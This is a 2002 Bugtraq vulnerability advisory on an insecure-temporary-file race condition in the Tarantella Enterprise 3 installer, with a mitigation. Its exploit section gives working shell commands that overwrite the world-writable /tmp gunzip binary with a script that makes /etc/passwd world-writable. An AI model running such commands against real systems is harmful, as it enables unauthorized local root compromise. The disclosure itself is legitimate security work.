[24000] in bugtraq
Vulnerability report for Tarantella Enterprise 3.
daemon@ATHENA.MIT.EDU (Larry W. Cashdollar)
Sat Jan 26 18:16:06 2002
Date: Sat, 26 Jan 2002 09:46:34 -0500 (EST)
From: "Larry W. Cashdollar" <lwc@vapid.dhs.org>
To: <bugtraq@security-focus.com>
Cc: <vulnwatch@vulnwatch.org>
In-Reply-To: <3C516548.2070802@snosoft.com>
Message-ID: <20020126094434.S26298-100000@vapid.dhs.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Vapid Labs
Larry W. Cashdollar
1/14/2002
Vulnerability report for Tarantella Enterprise 3.
1. local root compromise during installation:
The installation script provided with tarentella handles utility
packages during installation insecurely. A root owned binary "gunzip"
is created in /tmp with world writeable permissions, the pid is appended
to the filename.
TMP_GUNZIP=$TMPDIR/gunzip$$
$ ls -l /tmp/gunzip16152
- -rwxrwxrwx 1 root root 51808 Jan 14 00:15 gunzip16152
gunzip is extracted:
extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE
The permissions of gunzip are changed to rwx for all:
chmod 777 $TMP_GUNZIP >/dev/null 2>&1
The binary is used during installation:
extract $efilename | $TMP_GUNZIP -q > "$efilename"
2. Exploit:
There is a race condition between when gunzip is extracted and used during
installation. At which time a malicious local user could inject code to
compromise the system quickly.
$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh
$ cat /tmp/test.sh > /tmp/gunzip16152
I was able to change the permissions of /etc/passwd to 777 by performing the
above as an unpriviledged user.
3. Recommendations:
Perhaps create a directory in /tmp or /var/tmp and use that directory as a
work place?
umask 077
mkdir /tmp/workdir
4. Software: Tarantella Enterprise 3
http://www.tarantella.com/download/e3/
Tested on Linux Debian 2.2
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE8QmV21hSQ6Gxh/KoRAhYIAJ0aDduF4k/fHV1O+24W8C6uNkokIwCgp2OL
gaJAw7urwOy0Ue03nEjlH2Q=
=TdDa
-----END PGP SIGNATURE-----
